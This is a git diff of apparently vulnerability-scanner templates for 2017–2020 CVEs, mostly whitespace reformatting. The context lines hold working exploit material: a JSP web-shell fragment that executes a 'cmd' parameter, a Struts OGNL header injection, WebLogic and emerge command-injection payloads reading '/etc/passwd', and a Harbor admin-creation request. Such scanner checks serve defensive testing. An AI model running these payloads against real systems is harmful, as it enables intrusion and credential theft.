+ Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+ OutputStream os = p.getOutputStream();
+ InputStream in = p.getInputStream();
+ DataInputStream dis = new DataInputStream(in);
+ String disr = dis.readLine();
+ while ( disr != null ) {
+ out.println(disr);
+ disr = dis.readLine();
+ }
+ }
+ %>
- method: GET
path:
diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml
index 8a40ce4dc2..f9f543a9b9 100644
--- a/cves/2017/CVE-2017-12629.yaml
+++ b/cves/2017/CVE-2017-12629.yaml
@@ -6,10 +6,10 @@ info:
severity: critical
tags: cve,cve2017,solr,apache,oob,xxe
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- - https://twitter.com/honoki/status/1298636315613974532
- - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
- - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
+ - https://twitter.com/honoki/status/1298636315613974532
+ - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
+ - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
requests:
- raw:
diff --git a/cves/2017/CVE-2017-12637.yaml b/cves/2017/CVE-2017-12637.yaml
index a2b0c6451a..46cbdb8d04 100644
--- a/cves/2017/CVE-2017-12637.yaml
+++ b/cves/2017/CVE-2017-12637.yaml
@@ -7,9 +7,9 @@ info:
description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
tags: cve,cve2017,sap,lfi
reference:
- - https://www.cvedetails.com/cve/CVE-2017-12637/
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
- - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
+ - https://www.cvedetails.com/cve/CVE-2017-12637/
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
+ - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
requests:
- method: GET
diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml
index 9b73a32f7b..6a91a097cf 100644
--- a/cves/2017/CVE-2017-14535.yaml
+++ b/cves/2017/CVE-2017-14535.yaml
@@ -5,8 +5,8 @@ info:
author: pikpikcu
severity: high
reference:
- - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- - https://www.exploit-db.com/exploits/49913
+ - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
+ - https://www.exploit-db.com/exploits/49913
tags: cve,cve2017,trixbox,rce
requests:
diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml
index 6ccc47bee7..87579df08b 100644
--- a/cves/2017/CVE-2017-14537.yaml
+++ b/cves/2017/CVE-2017-14537.yaml
@@ -7,9 +7,9 @@ info:
tags: cve,cve2017,trixbox,lfi
description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2017-14537
- - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
- - https://sourceforge.net/projects/asteriskathome/ # vendor homepage
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-14537
+ - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
+ - https://sourceforge.net/projects/asteriskathome/ # vendor homepage
requests:
- raw:
diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml
index 9cb67b8924..2312d8d61a 100644
--- a/cves/2017/CVE-2017-15944.yaml
+++ b/cves/2017/CVE-2017-15944.yaml
@@ -4,8 +4,8 @@ info:
name: PreAuth RCE on Palo Alto GlobalProtect
author: emadshanab,milo2012
reference:
- - https://www.exploit-db.com/exploits/43342
- - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
+ - https://www.exploit-db.com/exploits/43342
+ - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
severity: high
tags: cve,cve2017,rce,vpn,paloalto,globalprotect
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
index 1a84749dbd..954ace9e22 100644
--- a/cves/2017/CVE-2017-3506.yaml
+++ b/cves/2017/CVE-2017-3506.yaml
@@ -7,8 +7,8 @@ info:
severity: high
tags: cve,cve2017,weblogic,oracle,rce,oob
reference:
- - https://hackerone.com/reports/810778
- - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
+ - https://hackerone.com/reports/810778
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
requests:
- raw:
diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml
index 2a44a34b56..2003bf9c99 100644
--- a/cves/2017/CVE-2017-3528.yaml
+++ b/cves/2017/CVE-2017-3528.yaml
@@ -5,8 +5,8 @@ info:
author: 0x_Akoko
severity: low
reference:
- - https://blog.zsec.uk/cve-2017-3528/
- - https://www.exploit-db.com/exploits/43592
+ - https://blog.zsec.uk/cve-2017-3528/
+ - https://www.exploit-db.com/exploits/43592
tags: oracle,redirect
requests:
diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml
index f69dbce79e..6063ad3685 100644
--- a/cves/2017/CVE-2017-5487.yaml
+++ b/cves/2017/CVE-2017-5487.yaml
@@ -7,8 +7,8 @@ info:
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
tags: cve,cve2017,wordpress
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
- - https://www.exploit-db.com/exploits/41497
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
+ - https://www.exploit-db.com/exploits/41497
requests:
- method: GET
diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml
index 5d477c119a..e09313bde2 100644
--- a/cves/2017/CVE-2017-5638.yaml
+++ b/cves/2017/CVE-2017-5638.yaml
@@ -10,15 +10,15 @@ info:
requests:
- raw:
- |
- GET / HTTP/1.1
- Host: {{Hostname}}
- Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
- Accept-Language: en
- Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
- Connection: Keep-Alive
- User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
- Pragma: no-cache
- Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
+ Accept-Language: en
+ Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
+ Connection: Keep-Alive
+ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
+ Pragma: no-cache
+ Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers:
- type: word
diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml
index 6ed5ae081c..008a0df385 100644
--- a/cves/2017/CVE-2017-9805.yaml
+++ b/cves/2017/CVE-2017-9805.yaml
@@ -18,63 +18,63 @@ requests:
headers:
Content-Type: application/xml
body: |
-
+
matchers-condition: and
matchers:
diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml
index cd50ef3c89..1b13402b1e 100644
--- a/cves/2018/CVE-2018-16059.yaml
+++ b/cves/2018/CVE-2018-16059.yaml
@@ -5,8 +5,8 @@ info:
author: daffainfo
severity: medium
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- - https://www.exploit-db.com/exploits/45342
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-16059
+ - https://www.exploit-db.com/exploits/45342
tags: cve,cve2018,iot,lfi
requests:
diff --git a/cves/2018/CVE-2018-16283.yaml b/cves/2018/CVE-2018-16283.yaml
index a7e3337a69..f0ff1c0ca4 100644
--- a/cves/2018/CVE-2018-16283.yaml
+++ b/cves/2018/CVE-2018-16283.yaml
@@ -5,8 +5,8 @@ info:
author: 0x240x23elu
severity: critical
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2018-16283
- - https://www.exploit-db.com/exploits/45438
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-16283
+ - https://www.exploit-db.com/exploits/45438
tags: cve,cve2018,wordpress,wp-plugin,lfi
requests:
diff --git a/cves/2018/CVE-2018-17431.yaml b/cves/2018/CVE-2018-17431.yaml
index 0a5c845723..9f70ac8290 100644
--- a/cves/2018/CVE-2018-17431.yaml
+++ b/cves/2018/CVE-2018-17431.yaml
@@ -7,8 +7,8 @@ info:
description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based)
tags: cve,cve2018,comodo,rce
reference:
- - https://www.exploit-db.com/exploits/48825
- - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
+ - https://www.exploit-db.com/exploits/48825
+ - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
requests:
- raw:
diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml
index 297a1e31fc..bb3a606f79 100644
--- a/cves/2018/CVE-2018-8715.yaml
+++ b/cves/2018/CVE-2018-8715.yaml
@@ -7,7 +7,7 @@ info:
description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
tags: cve,cve2018,appweb,auth-bypass
reference:
- - https://github.com/embedthis/appweb/issues/610
+ - https://github.com/embedthis/appweb/issues/610
requests:
- raw:
diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml
index d367f5e9a6..ff40e30a68 100644
--- a/cves/2019/CVE-2019-0193.yaml
+++ b/cves/2019/CVE-2019-0193.yaml
@@ -6,9 +6,9 @@ info:
author: pdteam
severity: critical
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2019-0193
- - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
- - https://paper.seebug.org/1009/
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-0193
+ - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
+ - https://paper.seebug.org/1009/
tags: cve,cve2019,apache,rce,solr,oob
requests:
diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml
index 14eba8a50d..8527f6724d 100644
--- a/cves/2019/CVE-2019-0221.yaml
+++ b/cves/2019/CVE-2019-0221.yaml
@@ -9,10 +9,10 @@ info:
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
- https://www.exploit-db.com/exploits/50119
description: |
- The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
- 7.0.0 to 7.0.93 echoes user provided data without escaping and is,
- therefore, vulnerable to XSS. SSI is disabled by default.
- The printenv command is intended for debugging and is unlikely to be present in a production website.
+ The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
+ 7.0.0 to 7.0.93 echoes user provided data without escaping and is,
+ therefore, vulnerable to XSS. SSI is disabled by default.
+ The printenv command is intended for debugging and is unlikely to be present in a production website.
tags: cve,cve2019,apache,xss
requests:
diff --git a/cves/2019/CVE-2019-1010287.yaml b/cves/2019/CVE-2019-1010287.yaml
index c67b2a83d4..6943ee9c04 100644
--- a/cves/2019/CVE-2019-1010287.yaml
+++ b/cves/2019/CVE-2019-1010287.yaml
@@ -12,7 +12,7 @@ info:
google-dork: inurl:"/timesheet/login.php"
requests:
- - raw: # Metod POST From login.php
+ - raw: # Metod POST From login.php
- |
POST /timesheet/login.php HTTP/1.1
Host: {{Hostname}}
diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml
index 84cbe7584e..7b9df06171 100644
--- a/cves/2019/CVE-2019-12616.yaml
+++ b/cves/2019/CVE-2019-12616.yaml
@@ -7,9 +7,9 @@ info:
severity: medium
tags: cve,cve2019,phpmyadmin,csrf
reference:
- - https://www.phpmyadmin.net/security/PMASA-2019-4/
- - https://www.exploit-db.com/exploits/46982
- - https://nvd.nist.gov/vuln/detail/CVE-2019-12616
+ - https://www.phpmyadmin.net/security/PMASA-2019-4/
+ - https://www.exploit-db.com/exploits/46982
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-12616
requests:
- method: GET
@@ -32,4 +32,4 @@ requests:
- type: status
status:
- 200
- - 401 #password protected
+ - 401 # password protected
diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml
index 007cdd429a..7569402a99 100644
--- a/cves/2019/CVE-2019-13101.yaml
+++ b/cves/2019/CVE-2019-13101.yaml
@@ -7,9 +7,9 @@ info:
severity: critical
tags: cve,cve2019,dlink,router,iot
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2019-13101
- - https://github.com/d0x0/D-Link-DIR-600M
- - https://www.exploit-db.com/exploits/47250
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-13101
+ - https://github.com/d0x0/D-Link-DIR-600M
+ - https://www.exploit-db.com/exploits/47250
requests:
- raw:
diff --git a/cves/2019/CVE-2019-15043.yaml b/cves/2019/CVE-2019-15043.yaml
index 14c565d303..dddcb93e9e 100644
--- a/cves/2019/CVE-2019-15043.yaml
+++ b/cves/2019/CVE-2019-15043.yaml
@@ -6,7 +6,7 @@ info:
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
reference:
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
- - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
+ - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
- https://community.grafana.com/t/release-notes-v6-3-x/19202
tags: cve,cve2019,grafana
diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml
index 4bea33bbe8..c04cf98e43 100644
--- a/cves/2019/CVE-2019-15107.yaml
+++ b/cves/2019/CVE-2019-15107.yaml
@@ -9,7 +9,7 @@ info:
tags: cve,cve2019,webmin,rce
requests:
- - raw: #
+ - raw: #
- |
POST /password_change.cgi HTTP/1.1
Host: {{Hostname}}
diff --git a/cves/2019/CVE-2019-16097.yaml b/cves/2019/CVE-2019-16097.yaml
index d1b82e8f42..bbcb4dd03f 100644
--- a/cves/2019/CVE-2019-16097.yaml
+++ b/cves/2019/CVE-2019-16097.yaml
@@ -6,8 +6,8 @@ info:
description: |
core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.
reference:
- - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
- - https://github.com/goharbor/harbor/issues/8951
+ - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
+ - https://github.com/goharbor/harbor/issues/8951
tags: cve,cve2019,intrusive,harbor
requests:
@@ -17,7 +17,7 @@ requests:
headers:
Content-Type: application/json
body: |
- {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
+ {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
matchers-condition: and
matchers:
diff --git a/cves/2019/CVE-2019-17506.yaml b/cves/2019/CVE-2019-17506.yaml
index a1b698f29b..3a6a05e8f2 100644
--- a/cves/2019/CVE-2019-17506.yaml
+++ b/cves/2019/CVE-2019-17506.yaml
@@ -14,7 +14,7 @@ requests:
- "{{BaseURL}}/getcfg.php"
body: |
- SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
+ SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
headers:
Content-Type: text/xml
diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml
index 03698e2cc1..7a4d6d2413 100644
--- a/cves/2019/CVE-2019-2616.yaml
+++ b/cves/2019/CVE-2019-2616.yaml
@@ -6,8 +6,8 @@ info:
severity: high
description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2019-2616
- - https://www.exploit-db.com/exploits/46729
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-2616
+ - https://www.exploit-db.com/exploits/46729
tags: cve,cve2019,oracle,xxe,oob
requests:
diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml
index 79f217f58c..0ee815a902 100644
--- a/cves/2019/CVE-2019-2767.yaml
+++ b/cves/2019/CVE-2019-2767.yaml
@@ -6,8 +6,8 @@ info:
severity: high
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
- - https://www.exploit-db.com/exploits/46729
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
+ - https://www.exploit-db.com/exploits/46729
tags: cve,cve2019,oracle,xxe,oob
requests:
diff --git a/cves/2019/CVE-2019-3396.yaml b/cves/2019/CVE-2019-3396.yaml
index 646c8d53ef..48af892d4f 100644
--- a/cves/2019/CVE-2019-3396.yaml
+++ b/cves/2019/CVE-2019-3396.yaml
@@ -10,16 +10,16 @@ info:
requests:
- raw:
- |
- POST /rest/tinymce/1/macro/preview HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- Accept-Language: en-US,en;q=0.5
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
- Referer: {{Hostname}}
- Content-Length: 168
- Connection: close
+ POST /rest/tinymce/1/macro/preview HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Accept-Language: en-US,en;q=0.5
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+ Referer: {{Hostname}}
+ Content-Length: 168
+ Connection: close
- {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
+ {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
matchers-condition: and
matchers:
diff --git a/cves/2019/CVE-2019-7238.yaml b/cves/2019/CVE-2019-7238.yaml
index bd88faf42d..b989d29259 100644
--- a/cves/2019/CVE-2019-7238.yaml
+++ b/cves/2019/CVE-2019-7238.yaml
@@ -6,8 +6,8 @@ info:
severity: critical
tags: cve,cve2019,nexus,rce
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2019-7238
- - https://github.com/jas502n/CVE-2019-7238
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-7238
+ - https://github.com/jas502n/CVE-2019-7238
requests:
- raw:
diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml
index 93e7ed7adb..660516cef2 100644
--- a/cves/2019/CVE-2019-7256.yaml
+++ b/cves/2019/CVE-2019-7256.yaml
@@ -11,7 +11,7 @@ info:
tags: cve,cve2019,emerge,rce
requests:
- - raw: # Default Port
+ - raw: # Default Port
- |
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
Host: {{Hostname}}
diff --git a/cves/2019/CVE-2019-9733.yaml b/cves/2019/CVE-2019-9733.yaml
index f4623231a4..51972077b8 100644
--- a/cves/2019/CVE-2019-9733.yaml
+++ b/cves/2019/CVE-2019-9733.yaml
@@ -13,22 +13,22 @@ info:
requests:
- raw:
- |
- POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
- Host: {{Hostname}}
- Content-Length: 60
- Accept: application/json, text/plain, */*
- X-Requested-With: artUI
- serial: 58
- X-Forwarded-For: 127.0.0.1
- Request-Agent: artifactoryUI
- User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
- Content-Type: application/json
- Origin: http://{{Hostname}}
- Referer: http://{{Hostname}}/artifactory/webapp/
- Accept-Language: en-US,en;q=0.9
- Connection: close
+ POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 60
+ Accept: application/json, text/plain, */*
+ X-Requested-With: artUI
+ serial: 58
+ X-Forwarded-For: 127.0.0.1
+ Request-Agent: artifactoryUI
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
+ Content-Type: application/json
+ Origin: http://{{Hostname}}
+ Referer: http://{{Hostname}}/artifactory/webapp/
+ Accept-Language: en-US,en;q=0.9
+ Connection: close
- {"user":"access-admin","password":"password","type":"login"}
+ {"user":"access-admin","password":"password","type":"login"}
matchers-condition: and
matchers:
diff --git a/cves/2020/CVE-2019-9618.yaml b/cves/2020/CVE-2019-9618.yaml
index b857a53bc9..47d0f46a02 100644
--- a/cves/2020/CVE-2019-9618.yaml
+++ b/cves/2020/CVE-2019-9618.yaml
@@ -5,8 +5,8 @@ info:
author: 0x_Akoko
severity: critical
reference:
- - https://www.exploit-db.com/exploits/46537
- - https://nvd.nist.gov/vuln/detail/CVE-2019-9618
+ - https://www.exploit-db.com/exploits/46537
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:
diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml
index 5ab3e4810e..126476f33d 100644
--- a/cves/2020/CVE-2020-11034.yaml
+++ b/cves/2020/CVE-2020-11034.yaml
@@ -6,9 +6,9 @@ info:
severity: low
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6.
reference:
- - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
- - https://github.com/glpi-project/glpi/archive/9.4.6.zip
- - https://nvd.nist.gov/vuln/detail/CVE-2020-11034
+ - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
+ - https://github.com/glpi-project/glpi/archive/9.4.6.zip
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-11034
tags: cve,cve2020,redirect
diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml
index fac9efaabe..e39d531569 100644
--- a/cves/2020/CVE-2020-11978.yaml
+++ b/cves/2020/CVE-2020-11978.yaml
@@ -5,9 +5,9 @@ info:
severity: high
description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
reference:
- - https://github.com/pberba/CVE-2020-11978
- - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
- - https://twitter.com/wugeej/status/1400336603604668418
+ - https://github.com/pberba/CVE-2020-11978
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
+ - https://twitter.com/wugeej/status/1400336603604668418
tags: cve,cve2020,apache,airflow,rce
requests:
diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml
index e6ba5ee430..c21bdb58bb 100644
--- a/cves/2020/CVE-2020-13167.yaml
+++ b/cves/2020/CVE-2020-13167.yaml
@@ -10,16 +10,16 @@ info:
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
- # This template exploits a Python code injection in the Netsweeper
- # WebAdmin component's unixlogin.php script, for versions 6.4.4 and
- # prior, to execute code as the root user.
+# This template exploits a Python code injection in the Netsweeper
+# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
+# prior, to execute code as the root user.
- # Authentication is bypassed by sending a random whitelisted Referer
- # header in each request.
+# Authentication is bypassed by sending a random whitelisted Referer
+# header in each request.
- # Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
- # Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
- # been confirmed exploitable.
+# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
+# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
+# been confirmed exploitable.
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml
index 645363a779..844a1401f5 100644
--- a/cves/2020/CVE-2020-13700.yaml
+++ b/cves/2020/CVE-2020-13700.yaml
@@ -6,9 +6,9 @@ info:
severity: high
reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
description: |
- An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
- It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
- wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
+ An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
+ It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
+ wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
tags: cve,cve2020,wordpress
requests:
diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml
index 46ac04bffe..be27c3f3a9 100644
--- a/cves/2020/CVE-2020-13937.yaml
+++ b/cves/2020/CVE-2020-13937.yaml
@@ -5,12 +5,12 @@ info:
author: pikpikcu
severity: medium
description: |
- Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
- 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
- 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
- 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
- Kylin's configuration information without any authentication,
- so it is dangerous because some confidential information entries will be disclosed to everyone.
+ Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
+ 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
+ 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
+ 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
+ Kylin's configuration information without any authentication,
+ so it is dangerous because some confidential information entries will be disclosed to everyone.
reference:
- https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html
diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml
index dbb81a9dd2..84fa26ca9a 100644
--- a/cves/2020/CVE-2020-14883.yaml
+++ b/cves/2020/CVE-2020-14883.yaml
@@ -17,7 +17,7 @@ requests:
Test-Header: cat /etc/passwd
body: |
- test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = 